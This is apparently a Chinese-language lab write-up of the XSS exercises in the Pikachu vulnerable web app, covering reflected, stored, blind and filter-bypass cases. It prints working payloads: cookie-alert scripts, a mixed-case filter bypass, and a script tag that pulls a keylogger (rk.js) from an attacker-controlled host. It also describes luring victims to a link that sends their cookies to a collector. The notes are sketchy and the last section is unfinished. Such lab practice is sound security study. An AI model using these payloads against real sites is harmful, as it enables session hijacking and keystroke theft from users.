1.反射型xss

 输入kobe点submit发现url为http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=kobe&submit=submit,于是确定get传参的反射性

测试将kobe改为js    <script>alert(document.cookie)</script>,成功弹窗,说明xss无绕过

 2.反射型xss(post)

输入用户密码后发现url无变化,于是确定为post传参的反射型xss

 输入admin,123456登陆看到这个界面

 利用实验思路,修改一下攻击者与服务器的地址

http://192.168.171.129/pikachu/pkxss/xcookie/post.html

我们只需要诱导受害者点击上面的链接就能窃取用户的Cookie

3.存储型xss

存储型XSS和反射型XSS形成的原因是一样的,不同的是存储型XSS下攻击者的可以将脚本注入到后台存储起来,构成更加持久的危害

 直接提交语句构造payload就能成功

<script>alert("xss")</script>
键盘记录
我们需要去嵌入一个能够调用我们的远程js的方法,放一段代码进去。点提交后,这个js就被嵌入到这个页面中了。<script src="http://127.0.0.1/pkxss/rkeypress/rk.js"></script>
在页面上随便输入一个键盘,他会显示页面请求失败
重新打开xss的存储页面
我们随便输入几个数字,会发现js能把我们的输入全都抓下

4.盲打

 登陆后台(admin 123456)一登陆就发现

 5.xss过滤

加符号探测:"'<>/

输入<script>alert('xss')</script>

 script被过滤了

再用<sCRipt>alert('xss')</sCRipt>进行试

 成功

6.herf输出

尝试js转移

 
12-23 12:08